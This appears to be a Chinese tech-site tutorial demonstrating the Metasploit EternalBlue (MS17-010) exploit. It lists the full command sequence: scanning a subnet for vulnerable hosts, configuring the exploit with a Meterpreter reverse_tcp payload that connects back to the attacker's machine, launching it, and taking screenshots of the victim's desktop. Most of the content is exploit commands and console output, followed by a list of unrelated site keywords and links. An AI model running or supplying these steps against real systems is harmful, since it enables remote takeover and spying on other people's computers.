使用MSF对MS17-010的利用演示
发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,过程:1、扫描: 信息搜集(刺探)2、漏洞利用一、首先检测网段内存在漏洞的主机系统:使用命令:msf > use auxiliary/scanner/smb/smb_ms17_010 /
千家信息网最后更新 2025年01月21日使用MSF对MS17-010的利用演示
过程:
1、扫描: 信息搜集(刺探)
2、漏洞利用
一、首先检测网段内存在漏洞的主机系统:
使用命令:
msf > use auxiliary/scanner/smb/smb_ms17_010 //加载扫描expmsf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 //配置扫描网段msf auxiliary(scanner/smb/smb_ms17_010) > run //进行扫描
结果如下:
二、漏洞利用
msf利用命令如下:
msf > use exploit/windows/smb/ms17_010_eternalblue //加载***模块msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置***目标IPRHOSTS => 192.168.22.25msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本机IPLHOST => 192.168.5.146msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //配置回链方式payload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) >
查看当前配置的payload
msf exploit(windows/smb/ms17_010_eternalblue) > show options //查看配置选项Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.22.25 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.5.146 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packsmsf exploit(windows/smb/ms17_010_eternalblue) >
发起***:
***命令: msf exploit(windows/smb/ms17_010_eternalblue) > exploit //发起***
获取对方电脑桌面:
meterpreter > screenshotScreenshot saved to: /root/RBDEvfGv.jpeg //可以到root目录下 查看对方电脑的截屏
获取shel权限
有关更多获取权限后的***技巧, 请自行百度 msf 后*** ***模块
配置
命令
漏洞
对方
权限
模块
电脑
网段
主机
信息
内存
技巧
方式
更多
桌面
目录
目标
系统
结果
过程
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
十堰市校园网络安全线上答题软件
杭州市一手淘网络技术有限公司
网页怎么同步到服务器
海格互联网科技有限公司
电视无法解析服务器域名怎么弄
江苏数据软件开发检测中心
中医院大数据库
我的小游戏服务器
html怎么直接操作数据库
网络安全意思手抄报
招商银行校招软件开发岗
队站组织观看网络安全教育视频
国外运动医学生物信息数据库
网络安全技术应用答案
数据库运动员
shell 导入数据库
金优米互联网科技靠谱
杭州印孚瑟斯软件开发
winmail邮件服务器注册版
互联网科技和新媒体
服务器如何选择几核
mssql 新建数据库
软件开发没有技术面试问题
更换IP地址才能访问数据库
包头网络安全大会
马尾区医院网络安全项目中标
数据库好的题材
桂林公安网络安全支队长
dell服务器led屏幕不亮
央视软件开发
